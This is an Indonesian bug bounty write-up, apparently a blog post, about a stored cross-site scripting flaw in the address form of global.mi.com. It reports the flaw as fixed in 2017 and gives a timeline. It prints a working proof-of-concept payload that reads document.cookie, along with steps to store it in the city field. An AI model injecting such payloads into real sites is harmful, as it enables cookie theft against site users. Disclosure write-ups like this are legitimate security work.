mi.com | Bug XSS In website Xiaomi
How i found bug XSS (Cross-site-scripting) in website xiaomi
hai, kali ini saya bakalan share bug XSS di salah satu website xiaomi yaitu di mi.com
sedikit tentang website mi.com :
global.mi.com adalah salah satu website xiaomi store dan informasi tentang produk xiaomi bisa kita lihat di website tersebut seperti spesifikasi dan harga asli xiaomi, ga banyak juga yang saya tau namun lebih lengkap nya bisa anda lihat di global.mi.com
PoC :
script xss : '">><marquee><img src=x onerror=confirm (document.cookie)></ marquee>
url vuln : https://global.mi.com/en/user/address
1. buat address baru kemudian isi kota dengan script xss di atas
2. klik save
3. xss posed
Hall Of Fame Overall : 208
https://sec.xiaomi.com/fame?year=2017&month=10
Timeline :
• 31 oktober 2017 : Poc Send via sec.xiaomi.com
• 1 november 2017 : Under View
• 2 november 2017 : bug fixed
• 2 november 2017 : hall of fame sec.xiaomi.com https://sec.xiaomi.com/fame?year=2017&month=10
Jadi bug XSS itu apa gan ?
ReplyDelete